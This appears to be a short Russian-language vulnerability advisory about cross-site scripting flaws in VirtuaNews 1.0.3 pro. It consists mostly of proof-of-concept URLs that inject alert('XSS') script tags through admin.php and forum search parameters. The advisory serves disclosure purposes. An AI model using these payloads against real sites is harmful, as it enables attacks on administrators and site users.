Программа: VirtuaNews 1.0.3 pro 

Уязвимость в проверке правильности входных данных обнаружена в VirtuaNews. Удаленный пользователь может выполнить XSS нападение. 

http://<host>/admin.php?"> <script>alert('XSS')</script>

http://< host>/forum/search.php?do= process&showposts=0&query=<script>alert('XSS')
</script>

http://<host>/admin.php?action=vulns_add&catid= SELECT&title=~~~~~~~~~~~&mainnews=~~~~ ">
</textarea><script>alert('XSS')</script>

http://<host>/admin.php?action=vulns_add&catid= SELECT&title=~~~~~~~~~~~&mainnews=~~~~">
</textarea>--><script>alert('XSS')</s cript>

http://<host>/admin.php?">action=vulns_add&catid= SELECT&title=~~~~~~~~~~~&mainnews=~~~~">
</textarea><script>alert('XSS')</script>

http://<host>/admin.php?act ion=files&expand="> <script>alert('XSS')</script>

http://<host>/admin.php?action=files_cat_delete&id="> <script>alert('XSS')</script>

http://<host>/admin.php?action=f iles_check&catid="> <script>alert('XSS')</script>

http://<host>/admin.php?action=newslogo_upload&"> <script>alert('XSS')</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии